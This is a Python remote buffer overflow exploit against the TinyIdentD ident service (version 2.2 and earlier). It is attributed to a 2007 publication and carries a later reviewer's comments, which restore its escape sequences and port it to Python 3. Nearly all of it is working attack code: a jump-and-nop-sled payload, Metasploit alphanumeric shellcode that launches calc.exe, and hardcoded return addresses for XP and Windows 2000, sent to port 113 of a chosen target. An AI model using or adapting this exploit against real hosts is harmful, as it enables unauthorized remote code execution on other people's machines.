# Title : TinyIdentD <= 2.2 Remote Buffer Overflow Exploit
# Published : 2007-05-14
# Author : Thomas Pollet
#
#tinyidentd exploit code by
#thomas . pollet _at_ gmail . com
#bug by Maarten Boone
#
#usage: python exploit.py [target]
#
import socket,sys
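#jmp into nop sled
#
# NOTE(review): as published, every escape sequence in this listing had lost
# its backslash ('xebx20' instead of '\xeb\x20'), so the script actually sent
# ASCII text rather than the bytes the comments describe. The escapes are
# restored below and everything is assembled as bytes, which also lets the
# script run unchanged on Python 2 and 3 (the original was Python 2 only).
#
# Two-byte short jump: 2 + 0x20 = offset 34 from the start of the line, which
# is inside the nop sled that begins right after the 23-byte ident text.
JMP_SHORT = b'\xeb\x20'
#ident crap -- reads like an ordinary ident reply; it only pads the line
IDENT_TEXT = b', 28 : USERID : UNIX : '
# 4-byte value appended after the shellcode, labelled "jmp *%esi" by the
# author: presumably it overwrites a saved return address so execution comes
# back into the sled (the listing does not say more). Both values are tied to
# one specific DLL build (service pack / language not recorded) and will
# generally have to be re-found for other installs.
RET_ADDRESSES = {
    'xp': b'\x77\x13\x83\x7c',   # XP kernel32.dll
    'w2k': b'\xb1\x63\xd9\x77',  # W2K rpcrt4.dll
}
DEFAULT_TARGET_OS = 'xp'
# Author's size figure for the overflowing line. The original arithmetic also
# subtracted a 4-byte 'XXXX' placeholder that was afterwards replaced by the
# sled + shellcode, so the line really sent is 519 bytes plus a newline. Kept
# exactly, so every offset is unchanged from the published exploit.
BUFFER_SIZE = 523
PLACEHOLDER_LEN = 4
#metasploit alphanumeric shellcode calc.exe
SHELLCODE = (
    b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x44"
    b"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x54\x42\x32\x41\x42\x32\x42"
    b"\x41\x30\x42\x41\x58\x41\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b"
    b"\x58\x51\x54\x65\x50\x57\x70\x45\x50\x4e\x6b\x67\x35\x35\x6c\x4e"
    b"\x6b\x73\x4c\x55\x55\x71\x68\x67\x71\x68\x6f\x6c\x4b\x52\x6f\x46"
    b"\x78\x4e\x6b\x51\x4f\x71\x30\x74\x41\x7a\x4b\x30\x49\x6c\x4b\x54"
    b"\x74\x6e\x6b\x76\x61\x4a\x4e\x35\x61\x4b\x70\x6a\x39\x4c\x6c\x4d"
    b"\x54\x6b\x70\x30\x74\x54\x47\x6a\x61\x6a\x6a\x64\x4d\x63\x31\x79"
    b"\x52\x4a\x4b\x69\x64\x67\x4b\x32\x74\x65\x74\x66\x64\x31\x65\x4a"
    b"\x45\x6c\x4b\x71\x4f\x31\x34\x57\x71\x48\x6b\x52\x46\x6e\x6b\x64"
    b"\x4c\x52\x6b\x4e\x6b\x31\x4f\x77\x6c\x54\x41\x68\x6b\x4c\x4b\x57"
    b"\x6c\x6c\x4b\x57\x71\x4a\x4b\x4e\x69\x41\x4c\x65\x74\x67\x74\x4a"
    b"\x63\x75\x61\x4f\x30\x51\x74\x6c\x4b\x61\x50\x50\x30\x4f\x75\x4f"
    b"\x30\x32\x58\x64\x4c\x4c\x4b\x71\x50\x54\x4c\x4c\x4b\x70\x70\x57"
    b"\x6c\x4e\x4d\x6e\x6b\x73\x58\x35\x58\x4a\x4b\x36\x69\x6c\x4b\x4d"
    b"\x50\x4c\x70\x67\x70\x75\x50\x37\x70\x4c\x4b\x45\x38\x35\x6c\x41"
    b"\x4f\x57\x41\x68\x76\x53\x50\x30\x56\x6e\x69\x6b\x48\x6f\x73\x6f"
    b"\x30\x63\x4b\x62\x70\x30\x68\x58\x70\x6f\x7a\x57\x74\x51\x4f\x45"
    b"\x38\x6f\x68\x59\x6e\x4f\x7a\x66\x6e\x62\x77\x69\x6f\x38\x67\x73"
    b"\x53\x52\x41\x30\x6c\x71\x73\x64\x6e\x35\x35\x30\x78\x70\x65\x45"
    b"\x50\x44"
)


def build_payload(ret_addr=RET_ADDRESSES[DEFAULT_TARGET_OS]):
    """Assemble the overflowing ident line (without the trailing newline).

    Layout: JMP_SHORT | IDENT_TEXT | nop sled | SHELLCODE | ret_addr.
    The sled is sized so the whole line keeps the author's fixed length.

    Args:
        ret_addr: 4-byte value appended after the shellcode; defaults to the
            XP kernel32.dll entry of RET_ADDRESSES.

    Returns:
        The payload as bytes.

    Raises:
        ValueError: if ret_addr is not 4 bytes, or the shellcode is too large
            for BUFFER_SIZE (the sled length would go negative).
    """
    if len(ret_addr) != 4:
        raise ValueError('return address must be exactly 4 bytes')
    fixed = len(JMP_SHORT) + len(IDENT_TEXT) + PLACEHOLDER_LEN + len(ret_addr)
    nop_count = BUFFER_SIZE - fixed - len(SHELLCODE)
    if nop_count < 0:
        raise ValueError('shellcode too large for the buffer')
    return b''.join([JMP_SHORT, IDENT_TEXT, b'\x90' * nop_count, SHELLCODE, ret_addr])


def main(argv=None):
    """Send the payload to port 113 (ident) of the target.

    Usage: exploit.py <target> [xp|w2k]   (default: xp)

    Args:
        argv: argument vector; defaults to sys.argv.

    Returns:
        Exit status: 0 after a completed send, 1 on a socket error,
        2 on bad arguments.
    """
    argv = sys.argv if argv is None else argv
    prog = argv[0] if argv else 'exploit.py'
    os_key = argv[2] if len(argv) == 3 else DEFAULT_TARGET_OS
    if len(argv) not in (2, 3) or os_key not in RET_ADDRESSES:
        print('usage : %s [target] [%s]' % (prog, '|'.join(sorted(RET_ADDRESSES))))
        return 2
    target = argv[1]
    data = build_payload(RET_ADDRESSES[os_key]) + b'\n'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((target, 113))
        # sendall, not send: send() may write only part of the buffer.
        sock.sendall(data)
    except socket.error as exc:
        # The original caught everything here and printed the usage text,
        # so a refused connection looked like a typo on the command line.
        print('send to %s:113 failed: %s' % (target, exc))
        return 1
    finally:
        sock.close()
    # A completed send says nothing about whether the overflow worked: this
    # exchange has no feedback channel, so verify on the target side.
    print('done')
    return 0


if __name__ == '__main__':
    sys.exit(main())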